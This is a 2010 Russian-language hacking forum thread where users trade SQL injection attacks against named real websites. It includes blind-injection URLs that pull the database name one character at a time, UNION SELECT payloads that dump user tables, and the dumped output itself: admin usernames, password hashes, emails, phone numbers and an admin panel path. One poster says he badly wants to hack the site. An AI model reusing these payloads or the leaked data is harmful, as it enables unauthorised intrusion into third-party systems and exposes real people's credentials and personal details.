10.06.2010, 19:26
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Не могу вывести database().
Код HTML:
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=2 and substring(version(),1,1)=5
|
|
|
10.06.2010, 19:40
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
там нету инъекции...
|
|
|
|
10.06.2010, 20:25
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
С нами:
9132514
Репутация:
41
|
|
2 FlaktW
Код:
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1)
db197513_ и так далее.. |
|
|
|
10.06.2010, 20:44
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от BlackFan
2 FlaktW
Код:
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1)
db197513_ и так далее..
Это скрипт или программа?
|
|
|
|
11.06.2010, 00:15
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
я думаю что в браузере это вводить надо) но можно как скрипт написать)
|
|
|
|
11.06.2010, 10:57
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Подобрал ордером число колоно - 4
Выводу юнионом, возникает ошибка
Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
|
|
|
|
11.06.2010, 11:05
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от wildshaman
Подобрал ордером число колоно - 4
Выводу юнионом, возникает ошибка
Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
Двойной запрос...
|
|
|
|
11.06.2010, 11:09
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Ну я примерно так и понял 
Делать-то что?(
И еще, в другой скуле при юнионе пишет:
Invalid query: Unknown column 'createTime' in 'field list'
Как крутить?( |
|
|
|
11.06.2010, 20:05
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
Попробуй крутить как blind, error-base blind sql injection, не факт, что сработает, но как вариант, думаю можно попробовать
|
|
|
|
11.06.2010, 20:16
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Очень хочется взломать этот сайт! Что можете предложить?
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
md5_id,
full_name,
user_name,
user_email,
user_level,
pwd,
address,
country,
tel,
fax,
website,
date,
users_ip,
approved,
activation_code,
banned,
ckey,
ctime),6,7,8+from+etrack+--+
54::admin:admin:admin@localhost:5:4c09e75fa6fe3603 8ac240e9e4e0126cedef6d8c85cf0a1ae:admin:Switzerlan d:4433093999:::2010-05-04::1:0:0:uqd1y4v:1272992243
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
full_name,
user_name,
user_pwd,
user_email,
activation_code,
joined,
country,
user_activated),6,7,8+from+users+--+
6:admin::5f0210ed3fa1e3301e5fac5928cc9712:web@sisc o.com.sa:8971:2008-12-30:India:1
админка: www.rsgt.com/admin
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
